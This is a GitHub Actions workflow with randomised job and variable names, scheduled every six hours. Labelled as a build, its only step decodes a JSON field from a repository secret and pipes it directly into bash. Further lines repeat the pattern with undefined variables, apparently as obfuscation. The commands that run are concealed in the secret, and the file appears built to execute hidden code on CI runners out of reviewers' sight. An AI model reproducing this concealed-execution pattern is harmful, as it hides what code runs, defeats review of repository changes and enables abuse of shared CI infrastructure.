name: zgjdfbl
on:
  workflow_dispatch:
  schedule:
    - cron: '49 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zgjdfbl
        env:
          zkeap170: ${{ secrets.zkeap170 }}
        run: |
          echo $zkeap170 | jq -r .yf14477 | /bin/bash
          echo $mawqo18 | jq -r .t625 | /bin/bash
          echo $gc30457 | jq -r .bc93 | /bin/bash
          echo $xwt68 | jq -r .mzz2810 | /bin/bash
          echo $qaz069 | jq -r .ebxxh35060 | /bin/bash
          echo $evr3 | jq -r .bmnh88 | /bin/bash
          echo $maed8 | jq -r .x6 | /bin/bash
          echo $ejon5 | jq -r .w42 | /bin/bash
          echo $edxz717 | jq -r .fttlh2393 | /bin/bash
          echo $zjy8 | jq -r .yzwou0 | /bin/bash
          echo $k7 | jq -r .brf4 | /bin/bash
          echo $gfafk29781 | jq -r .opim592 | /bin/bash

